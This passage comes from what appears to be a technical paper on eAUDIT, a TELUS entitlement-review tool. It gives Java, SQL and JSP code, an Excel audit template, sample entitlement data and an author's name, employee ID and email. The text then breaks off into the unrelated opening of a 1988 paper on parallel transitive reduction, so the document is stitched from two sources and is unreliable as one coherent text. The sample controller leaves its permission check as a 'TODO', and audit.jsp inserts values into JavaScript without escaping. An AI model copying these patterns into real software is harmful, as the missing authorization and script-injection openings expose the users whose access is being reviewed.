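            AuditAggregate agg = byEntitlement.computeIfAbsent(row[0],
                    k -> new AuditAggregate());     // new Audit record on first sight
            agg.totalNumberOfEntities++;            // Audit.TotalNumberOfEntities
            agg.entities.add(row[1]);
        }
        return byEntitlement;                       // then one batched massLoad()
    }

    public static void main(String[] args) {
        Map<String, AuditAggregate> m = group(List.of(
                new String[]{"\"R\" DR Site", "badge-1000000"},
                new String[]{"\"R\" DR Site", "badge-1000001"},
                new String[]{"\"R\" Wire Center", "badge-1000002"}));
        System.out.println(m.get("\"R\" DR Site").totalNumberOfEntities); // 2
    }
}
```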
### 2.5. Web interface implementation
Gathering data and normalizing it into a database is fine, but eAUDIT needs to present this data to authorizers to allow for an efficient review. Currently, the web interface implementation of eAUDIT exists as a proof-of-concept written in Java and deployed in a customized Spring framework commonly used by TELUS Chief Security Office (CSO). Obviously, this customized framework is infused with TELUS enterprise standards: it relies on TELUS’s single sign-on (SSO) infrastructure, it has built-in security groups based on TELUS employee IDs, and it makes heavy use of TELUS-branded CSS. Many of these elements are either irrelevant to another organization or considered proprietary to TELUS and therefore will not be discussed here.
That being said, the core of the eAUDIT web implementation can be covered. This core is the audit interface, and to a lesser extent, the landing page for authorizers. Figure 18 shows the landing page for eAUDIT.
Welcome François Begin [T805959]. You have the following audits to complete:
<table>
<thead>
<tr>
<th>Audit Name</th>
<th>Audit Description</th>
<th>Start Date</th>
<th>End Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>Canucks? stay or go?</td>
<td>Audit Canucks players and decide to keep them on the team next year or not!</td>
<td>2015-05-10</td>
<td>2015-06-30</td>
</tr>
<tr>
<td>eSAM active contractor audit</td>
<td>Audit eSAM contractors to determine if they are still active and report to a specific manager</td>
<td>2015-04-19</td>
<td>2015-06-19</td>
</tr>
<tr>
<td>Generic Audit example</td>
<td>An example of a generic audit to illustrate how the load template works</td>
<td>2015-05-10</td>
<td>2015-06-31</td>
</tr>
<tr>
<td>Restricted profiles in data center</td>
<td>Audit "R" profiles at data centers. These profiles always start with "R" IDC</td>
<td>2015-04-19</td>
<td>2015-06-19</td>
</tr>
</tbody>
</table>
The landing page is a simple data table shown when an authorizer logs in to the tool. A query is run using the employee ID of the authorizer, as authenticated by SSO, and returns the audits that are currently active for that person (see Figure 19):
```
-- Active AuditTypeReference records for authorizer T805959 (numerical ID 805959)
SELECT DISTINCT atr.idAuditTypeReference, atr.AuditName, atr.AuditDescription
FROM Audit AS a
JOIN Authorizers AS au ON (au.idAudit = a.idAudit)
JOIN AuditTypeReference AS atr ON (a.idAuditTypeReference = atr.idAuditTypeReference)
WHERE au.AuthorizerEmpID = 805959
  AND atr.AuditEnd > NOW();
```

**Figure 18.** eAUDIT web interface main landing page for an authorizer.
The names of the audits are links to the review engine. Note that the audits here are AuditTypeReference records, with a single such record potentially representing multiple entitlements of similar entities.
If a user selects a specific audit, this request is intercepted by the controller. Appendix E and F show the simple code for the controller, as well as the SQL query that retrieves Entities records for a particular AuditTypeReference record – and a particular authorizer. Entities data is attached as an attribute called *EntityList* to a ModelAndView object (See Code sample 1).
```java
// Attach the entities for this audit and authorizer to the view
ModelAndView mv = new ModelAndView("audit");
mv.addObject("EntityList", auditDao.getEntitiesByAuditAndAuthorizer(auditID,
        SDDIHelper.getCurrentTeamMemberNumericalPIDFromRequest(request)));
```

**Code sample 1. Attaching entity data to a ModelAndView.**

Audit.jsp (Appendix G) is where this data gets presented to the authorizer. Fundamentally, this is a simple page that presents the audit name, description and a data table with the entities (Code sample 2 and Figure 20).

**Code sample 2. Main section of audit.jsp.**
The design decision to keep user-defined fields in JSON format was motivated by the fact that this format can easily be manipulated. JavaScript is used to generate the main audit data table on the fly. Although these fields are not easily or efficiently searchable across the whole dataset, once re-formatted into a data table the data becomes easily sortable and filterable.
User-defined primary fields form visible rows while hidden rows hold the secondary attributes. Clicking on the details icon will trigger the hidden rows and present them to the authorizer (Code sample 3 and Figure 21):
Figure 20. eAUDIT web interface audit review page.
```
$('tbody td img').click(function() {
    var nTr = this.parentNode.parentNode;
    if (this.src.match('details_close')) { /* row is already open - close it */
        this.src = '${pageContext.request.contextPath}/img/details_open.png';
        oTable.fnClose(nTr);
    } else { /* open this row */
        this.src = '${pageContext.request.contextPath}/img/details_close.png';
        oTable.fnOpen(nTr, fnFormatDetails(oTable, nTr), 'details');
    }
});
```
Code sample 3. Trigger to display/hide secondary entity attributes.
Figure 21. Displaying secondary user-defined entity attributes in eAUDIT web.
The table auto-adjusts to the number of user-defined primary fields and to the number of user-defined secondary fields. There is obviously a physical limitation on the amount of screen real estate that one has access to, so the number of primary fields must be kept reasonable. Primary fields should be chosen amongst those fields that are most likely to clearly identify the entity to an authorizer, with secondary fields used occasionally by the authorizer to ascertain whether or not to confirm the entitlement. This confirmation is handled by action buttons at the end of each row.
As previously mentioned, using a data table has numerous advantages, including the ability to sort and filter the data. The filtering in particular can be used to focus on specific entitlements if multiple entitlements are being reviewed by the same authorizer within the same audit (see figure 22). Moreover, all of the work is offloaded to the client, leaving the server to simply process user requests.
Since most of the heavy lifting is handled client-side, the tool must ensure that authorizers can only review entities and entitlements for which they are authorized, and this verification is made server-side, prior to updating table EntitiesAuditResponses.
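That server-side check boils down to verifying membership in the set of authorizers for the audit in question. A hypothetical sketch (`ResponseGuard` is not part of the actual implementation):

```java
import java.util.Map;
import java.util.Set;

// Hypothetical sketch of the server-side check: before an update to
// EntitiesAuditResponses is accepted, confirm the logged-in employee is an
// authorizer of the audit the entity belongs to.
public class ResponseGuard {
    // audit id -> employee IDs of its authorizers (would come from the Authorizers table)
    public static boolean mayRespond(Map<Integer, Set<Integer>> authorizers,
                                     int idAudit, int empId) {
        return authorizers.getOrDefault(idAudit, Set.of()).contains(empId);
    }

    public static void main(String[] args) {
        Map<Integer, Set<Integer>> auth = Map.of(2006, Set.of(805959));
        System.out.println(mayRespond(auth, 2006, 805959)); // true
        System.out.println(mayRespond(auth, 2008, 805959)); // false
    }
}
```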
### 2.6. Future enhancements
eAUDIT is still a proof-of-concept at this stage and requires polishing. The data model supports the ability for authorizers to delegate an audit to someone else. Delegation will give a busy authorizer the ability to offload some of his audit work to a trusted direct report. Additionally, the TELUS implementation will implicitly provide access to the supervisors of authorizers. This means that anyone above a base audit authorizer will be a super-authorizer, able to view and delegate any of these audits – or let their subalterns know they need to pick up the pace! Both the delegation feature and the implied super-authorizers feature should help promote high audit completion rates.
Another reality of audits is that the data provided may be stale or inadequate at load time. For instance, an employee loaded as an entity may not have a current manager. If the manager is the authorizer of a particular entitlement, this employee will not be reviewed. eAUDIT will address this challenge by taking the company’s organizational hierarchy into account when allowing entitlement review. It will provide reports to the audit administrator of these stale/incomplete records, allowing the administrator to review them himself, or re-assign them to someone who can.
Yet another feature of TELUS’s planned eAUDIT implementation is the use of a *PrimaryKey* in the Entities table to provide historical correlation between audits. This will allow an authorizer to determine whether or not this entity’s entitlement was reviewed or revoked the last time the audit ran.
Another important aspect of auditing that this paper did not cover is communication. A successful audit is one where authorizers are clearly informed of deadlines and reminded to meet them. The TELUS CSO has a communication tool called eMAC that is capable of handling audit communications (kickoff email, reminders, escalations) and eAUDIT will be tightly integrated with this tool to offer an end-to-end auditing solution.
### 3. Conclusion
This paper presented eAUDIT, a generic audit review tool to conduct entitlement reviews. This tool is currently being implemented at TELUS to mitigate some shortcomings of our identity and access management infrastructure. It should be noted that IAM is often seen through the lens of compliance, and it is true that TELUS’s predecessor audit tools have been compliance-driven. On the other hand, there are other solid business cases to be made with regard to auditing and managing access properly: operational effectiveness (or cost savings) as well as business enablement are other considerations (Osmanoglu, 2013). There is already evidence to support the proposition that eAUDIT will benefit TELUS beyond compliance.
References
Apache Foundation. (2015). *Apache POI - the Java API for Microsoft Documents*. Retrieved from https://poi.apache.org/.
Appendix A – eAUDIT data model
Appendix B – Setting up eAUDIT for a demo
Here is a quick overview of how to set up an environment to run/demo eAUDIT’s data acquisition capability. First, in a directory of your choice, clone the eAUDIT project code (Figure B-1).
Figure B-1. Cloning eAUDIT code from GitHub.
There are two separate projects in the code pulled from GitHub: the jEAUDITlibrary itself, as well as eAUDIT_BatchOps, a project to demonstrate data acquisition. You can import these projects into your preferred Java IDE to examine the code.
Next, you need to set up a server to run the eAUDIT database. eAUDIT was built on MySQL and the data model has been included as a MySQL WorkBench file inside jEAUDITlibrary (Figure B-2). A service account with read-write access to the database also needs to be created.
Figure B-2. MySQL WorkBench data model file for eAUDIT.
Prior to running eAUDIT_BatchOps, a few configuration changes must be made:
1. Edit files `db_eAUDITDV` and `db_eAUDITPR`. Set the database name, user, password and URL to point to the database that was created to hold eAUDIT data.
2. Edit files `StaticParamsDV` and `StaticParamsPR` (Figure B-3). Set the path for the system where you will be trying out eAUDIT_BatchOps. Logging can also be adjusted through the various `LOG_*` parameters.
3. Create the `toolBasePath` directories. Assuming the demo is running on a Linux computer and the configuration file shown in Figure B-3, the following directories would need to be created:
a. `/export/data/eaudit`
b. `/export/data/eaudit/tmp`
c. `/export/data/eaudit/logs`
Appendix C – AuditTypeRef sheet of the eAUDIT Excel template
<table>
<thead>
<tr>
<th>Field</th>
<th>Values</th>
<th>Help</th>
</tr>
</thead>
<tbody>
<tr>
<td>AuditName</td>
<td>Generic Audit example</td>
<td>Enter a short name that represents your audit</td>
</tr>
<tr>
<td>AuditDescription</td>
<td>An example of a generic audit to illustrate how the tool is used</td>
<td>Enter a short description of your audit</td>
</tr>
<tr>
<td>AuditStart</td>
<td>Sunday, May 10, 2015</td>
<td>Enter audit start date. Audit can only start 1 week from today at the earliest</td>
</tr>
<tr>
<td>AuditEnd</td>
<td>Sunday, May 31, 2015</td>
<td>Enter audit end date. Audit must last at least 1 week from its start date</td>
</tr>
<tr>
<td>AuditInstructionsEN</td>
<td><HTML> All of the employees in this list need to have entitlements for which you are the authorizer. Please review these entitlements at your earliest convenience. For each employee, please click the appropriate button to confirm or revoke the entitlement. Note that choosing revoke will not remove access until the audit has closed and the responses have been reviewed by the admin team. <BR> For any question related to this audit, please contact <a href="mailto:eauditadmin@acme.com">eauditadmin@acme.com</a> <BR></HTML></td>
<td>Enter the instructions that people you are auditing will see on the audit screen - English. HTML markup allowed</td>
</tr>
<tr>
<td>AuditInstructionsFR</td>
<td>Instructions in French here</td>
<td>Enter the instructions that people you are auditing will see on the audit screen - French. HTML markup allowed</td>
</tr>
<tr>
<td>UDEAprimaryFieldsEN</td>
<td>("Emp ID","Full Name","Emp Type","System ID")</td>
<td>List of UDEA primary fields names (labels in English, ISO-8859-1 format)</td>
</tr>
<tr>
<td>UDEAprimaryFieldsFR</td>
<td>UDEA in French</td>
<td>List of UDEA primary fields names (labels in French ISO-8859-1 format)</td>
</tr>
<tr>
<td>UDEAsecondaryFieldsEN</td>
<td>("Work Location","Province","Last login time to system")</td>
<td>List of UDEA secondary fields names (labels in English ISO-8859-1 format)</td>
</tr>
<tr>
<td>UDEAsecondaryFieldsFR</td>
<td>UDEA in French</td>
<td>List of UDEA secondary fields names (labels in French ISO-8859-1 format)</td>
</tr>
<tr>
<td>AuditByManager</td>
<td>0</td>
<td>0</td>
</tr>
<tr>
<td>DataLoadType</td>
<td>Excel-load</td>
<td>Either Excel-Load for data loaded via this template or Adapter-Load for data loaded by an adapter script</td>
</tr>
<tr>
<td>eMACircleTimelineID</td>
<td>0</td>
<td>0</td>
</tr>
<tr>
<td>UseEMAC</td>
<td>0</td>
<td>0</td>
</tr>
<tr>
<td>AuditManager</td>
<td>François Bégin</td>
<td>The name/ID of the person responsible for managing this particular audit. The Audit manager has extended rights to the audit (delegation, reporting, etc.)</td>
</tr>
</tbody>
</table>
### Appendix D – AuditData sheet of the eAUDIT Excel template
<table>
<thead>
<tr>
<th>PrimaryKey</th>
<th>Entitlement</th>
<th>Authorizers</th>
<th>UDEAprimary<br>(Emp ID)</th>
<th>UDEAprimary<br>(Full Name)</th>
<th>UDEAprimary<br>(Emp Type)</th>
<th>UDEAprimary<br>(System ID)</th>
<th>UDEAsecondary<br>(Work Location)</th>
<th>UDEAsecondary<br>(Province)</th>
<th>UDEAsecondary<br>(Last login time to system)</th>
</tr>
</thead>
<tbody>
<tr>
<td>123456</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123456</td>
<td>Melia Hobel Contractor MHbox1 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123467</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123467</td>
<td>Sonja Casiano Regular Statismatic Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123468</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123468</td>
<td>Jack Shankle Regular Jh2001 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123469</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123469</td>
<td>Sal Rackham Contractor SRackham USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123470</td>
<td>Admin of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123470</td>
<td>Brad Hildebrand Contractor BHildebrand USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123471</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123471</td>
<td>Kristian Denker Contractor EDenker USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123472</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123472</td>
<td>CECILIA HARVE Contractor Ch3001 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123473</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123473</td>
<td>Rebecca Piga Regular RHavig1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123474</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123474</td>
<td>Tomoko Melcicn Regular TMelcicn Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123475</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123475</td>
<td>Teshoda Burgess Contractor TBurg 1 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123476</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123476</td>
<td>Eleonora Vanniky Regular Evanniky Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123477</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123477</td>
<td>Giovanni Vennza Regular GVennza1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123478</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123478</td>
<td>Randee Noga Regular RNoga Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123479</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123479</td>
<td>Barrett Backle Regular BBackle1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123480</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123480</td>
<td>Monet Dehner Regular MDehner1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123481</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123481</td>
<td>Sonia Lawan Regular SLawan1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123482</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123482</td>
<td>Andy Emersen Regular AEimersen1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123483</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123483</td>
<td>Hayley Niemnn Contractor HNiemnn1 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123484</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123484</td>
<td>Samuel Ryer Contractor SRyer USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123485</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123485</td>
<td>Frederic Cason Contractor FCason1 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123486</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123486</td>
<td>Leslie Rappor Contractor LRappor1 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123487</td>
<td>Admin of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123487</td>
<td>Iris Stry Regular Stry1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123488</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123488</td>
<td>Joudie Voliace Regular JVoliace1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123489</td>
<td>Regular User of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123489</td>
<td>Sue Rosenberg Regular SROsenberg1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123490</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123490</td>
<td>Kenna Staggman Contractor KStaggman1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123491</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123491</td>
<td>Shirley Proctor Regular SProctor1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123492</td>
<td>Guest of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123492</td>
<td>Alreda Glickman Regular AGlickman1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123493</td>
<td>Admin of Ticketing System</td>
<td>200001</td>
<td>200002</td>
<td>123493</td>
<td>Alredo Herweg Regular AHerweg1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123494</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123494</td>
<td>Wes Greenz Regular WGreenz1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123495</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123495</td>
<td>Seema Singh ISingh1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123496</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123496</td>
<td>Jack Storkey Regular JSstrokey1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123497</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123497</td>
<td>Kriston DeHiler Contractor EDenker1 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123498</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123498</td>
<td>Gorica Hare Contractor CHare3 USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123499</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123499</td>
<td>Sumei Morena Contractor SMorena1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123500</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123500</td>
<td>Barrett Backle Regular BBackle1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123501</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123501</td>
<td>Monet Dehner Regular MDehner1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123502</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123502</td>
<td>Rex Goodrige Regular RGoodrige1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123503</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123503</td>
<td>Samuel Ryer Contractor SRyer USA California</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123504</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123504</td>
<td>Joudie Voliace Regular JVoliace1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123505</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123505</td>
<td>Sue Rosenberg Regular SROsenberg1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123506</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123506</td>
<td>Kenna Staggman Contractor KStaggman1 Canada Alberta</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123507</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123507</td>
<td>Alredo Herweg Regular AHerweg1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123508</td>
<td>User of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123508</td>
<td>Wes Greenz Regular WGreenz1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123509</td>
<td>Admin of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123509</td>
<td>Kenna Staggman Contractor KStaggman1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>123510</td>
<td>Admin of BackEnd System</td>
<td>200001</td>
<td>200002</td>
<td>123510</td>
<td>Alredo Herweg Regular AHerweg1 Canada Quebec</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
François Bégin, francois.begin@telus.com
### Appendix E – Controller that maps a request to an authorizer view of audit data
```java
@RequestMapping({"/audit/{auditID}"})
public ModelAndView displayAuditDetailsPage(@PathVariable String auditID)
        throws ObjectNotFoundException, SQLException {
    ModelAndView mv = new ModelAndView("audit");
    // TODO: validate permission
    IAuditDao auditDao = getAuditDao();
    // "request" is an HttpServletRequest field of the controller
    mv.addObject(USER_NAME, SDDIHelper.getCurrentTeamMemberNameFromRequest(request));
    mv.addObject(USER_TID, SDDIHelper.getCurrentTeamMemberTIDFromRequest(request));
    mv.addObject("AuditDetail", auditDao.getAuditDetailsByID(auditID));
    mv.addObject("EntityList", auditDao.getEntitiesByAuditAndAuthorizer(auditID,
            SDDIHelper.getCurrentTeamMemberNumericalPIDFromRequest(request)));
    return mv;
}
```
### Appendix F – SQL query getEntitiesByAuditIDAndAuthorizer to retrieve entities of a specific audit and specific authorizer
```xml
<statement id="getEntitiesByAuditIDAndAuthorizer"
resultMap="resultEntity"
parameterClass="map">
SELECT
e.idEntities, e.PrimaryKey,
e.UDEAprimaryFieldsValues,
e.UDEAsecondaryFieldsValues,
a.Entitlement,
resp.RecordedResponse
FROM Entities as e
INNER JOIN Audit as a
ON (e.Audit_idAudit=a.idAudit
AND a.AuditTypeReference_idAuditTypeReference = #auditType#)
LEFT JOIN Authorizers as auth
ON (auth.Audit_idAudit=a.idAudit)
LEFT JOIN EntitiesAuditResponses as resp
ON e.idEntities = resp.Entities_idEntities
WHERE auth.AuthorizerEmpID=#authorizerID#
</statement>
```
### Appendix G – audit.jsp: main page of the eAUDIT review engine
```jsp
<%@ taglib prefix="form" uri="http://www.springframework.org/tags/form"%>
<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%>
<%@ taglib prefix="fmt" uri="http://java.sun.com/jsp/jstl/fmt"%>
<%@ taglib prefix="fn" uri="http://java.sun.com/jsp/jstl/functions"%>
<%@ taglib prefix="spring" uri="http://www.springframework.org/tags"%>
<%@ taglib prefix="sec" uri="http://www.springframework.org/security/tags"%>
<script>
var numOfPrimaryColumns = ${fn:length(AuditDetail.primaryFields)};
$(document).ready(function() {
var rootPath = '${pageContext.request.contextPath}';
var data = [];
var secondaryFields = [
<c:forEach items="${AuditDetail.secondaryFields}" var="pfield2" varStatus="loop">
${pfield2}<c:if test="${!loop.last}">,</c:if>
</c:forEach>
];
<c:forEach items="${EntityList}" var="entity">
    data.push([
        '<img src="${pageContext.request.contextPath}/img/details_open.png">',
        <c:forEach items="${entity.primaryFields}" var="fieldValue">
        '${fieldValue}',
        </c:forEach>
        '${entity.entitlement}',
        '<div class="ui-corner-all list_icon text_icon grey action_yes" title="Keep"><span class="ui-icon ui-icon-check"></span></div><div
```
```javascript
var oTable = $('#dataTable').dataTable({
bJQueryUI: true,
"aaData": data,
"aoColumns": [
{ "sTitle": "", "sWidth": "20px" },
<c:forEach items="${AuditDetail.primaryFields}" var="pfield">
{ "sTitle": ${pfield} },
</c:forEach>
{ "sTitle": "Entitlement", "sWidth": "250px" },
{ "sTitle": "Actions", "sWidth": "40px" },
{ "sTitle": "details" }
],
"aoColumnDefs": [
{ "bSearchable": false, "bSortable": false,
"aTargets": [ 0 ] },
{ "bSearchable": false, "bSortable": false,
"aTargets": [ numOfPrimaryColumns + 2 ] }
];
});
```
```javascript
    { "bSearchable": false, "bVisible": false, "bSortable": false, "aTargets": [ numOfPrimaryColumns + 3 ] }
    ],
    "iDisplayLength": 1000,
    "sPaginationType": "full_numbers",
    "oLanguage": {
        "sProcessing": "<spring:message code="app.datatable.text1" />",
        "sLengthMenu": "<spring:message code="app.datatable.text2" />",
        "sZeroRecords": "<spring:message code="app.datatable.text3" />",
        "sSearch": "<spring:message code="app.datatable.text8" />",
        "sUrl": "<spring:message code="app.datatable.text9" />",
        "oPaginate": {
            "sPrevious": "<spring:message code="app.datatable.text11" />",
            "sNext": "<spring:message code="app.datatable.text12" />",
            "sLast": "<spring:message code="app.datatable.text13" />"
        }
    }
```
```javascript
/* Add event listener for opening and closing details.
 * Note that the indicator for showing which row is open is not
 * controlled by DataTables; rather it is done here. */
$('#dataTable tbody td img').click(function() {
    //var nTr = $(this).parents('tr')[0];
    var nTr = this.parentNode.parentNode;
    if ( this.src.match('details_close') ) { /* This row is already open - close it */
        this.src = "${pageContext.request.contextPath}/img/details_open.png";
        oTable.fnClose(nTr);
    } else { /* Open this row */
        this.src = "${pageContext.request.contextPath}/img/details_close.png";
        oTable.fnOpen(nTr, fnFormatDetails(oTable, nTr), 'details');
    }
});
$( "div.action_yes" ).mouseover(function() {
    $(this).addClass('green').removeClass('grey');
}).mouseout(function() {
    $(this).addClass('grey').removeClass('green');
}).click(function() {
    $(this).addClass('greenSelected').removeClass('grey');
    $(this).parent().find('div.action_no').removeClass('redSelected').addClass('grey');
});
```
```javascript
$( "div.action_no" ).mouseover(function() {
    $(this).addClass('red').removeClass('grey');
}).mouseout(function() {
    $(this).addClass('grey').removeClass('red');
}).click(function() {
    $(this).addClass('redSelected').removeClass('grey');
    $(this).parent().find("div.action_yes").removeClass('greenSelected').addClass('grey');
});
/* Formatting function for row details */
function fnFormatDetails(table, nTr) {
    var aData = table.fnGetData(nTr);
    return aData[numOfPrimaryColumns + 3];
}
```
</script>
<div><h3>${AuditDetail.auditName}</h3></div>
<div><h5>${AuditDetail.auditDescription}</h5></div>
<div id="tableContainer" style="margin-left:auto; margin-right:auto; width:auto;clear:both;">
<table id="dataTable" style="width:100%;"></table>
</div>
TRANSITIVE REDUCTION IN PARALLEL VIA BRANCHINGS
Phillip Gibbons
Richard Karp
Vijaya Ramachandran
Danny Soroker
Robert Tarjan
CS-TR-171-88
July 1988
TRANSITIVE REDUCTION IN PARALLEL VIA BRANCHINGS
Phillip Gibbons* Richard Karp*†
Computer Science Division, University of California, Berkeley, CA
Vijaya Ramachandran*‡
Coordinated Science Lab., University of Illinois, Urbana, IL
Danny Soroker*
IBM Almaden Research Center, San Jose, CA
Robert Tarjan§
Computer Science Dept., Princeton University, Princeton, NJ
and AT&T Bell Labs., Murray Hill, NJ
July 15, 1988
ABSTRACT
We study the following problem: given a strongly connected digraph, find a minimal strongly connected spanning subgraph of it. Our main result is a parallel algorithm for this problem, which runs in polylog parallel time and uses $O(n^2)$ processors on a PRAM. Our algorithm is simple and the major tool it uses is computing a minimum-weight branching with zero-one weights. We also present sequential algorithms for the problem that run in time $O(m+n\cdot\log n)$.
* Supported in part by the International Computer Science Institute, Berkeley, California.
† Also supported by NSF grant CCR-8411954.
‡ Also supported by Joint Services Electronics Program under N00014-84-C-0149.
§ Supported in part by NSF grant DCR-8605962 and ONR contract N00014-87-K-0457.
1. Introduction
The transitive reduction problem for strongly connected digraphs is: given a strongly connected digraph $G$, find a minimal strongly connected spanning subgraph of it, i.e., a strongly connected spanning subgraph for which the removal of any arc destroys strong connectivity. We are looking for a minimal subgraph because the problem of finding a minimum subgraph with the same transitive closure is NP-hard [GJ].
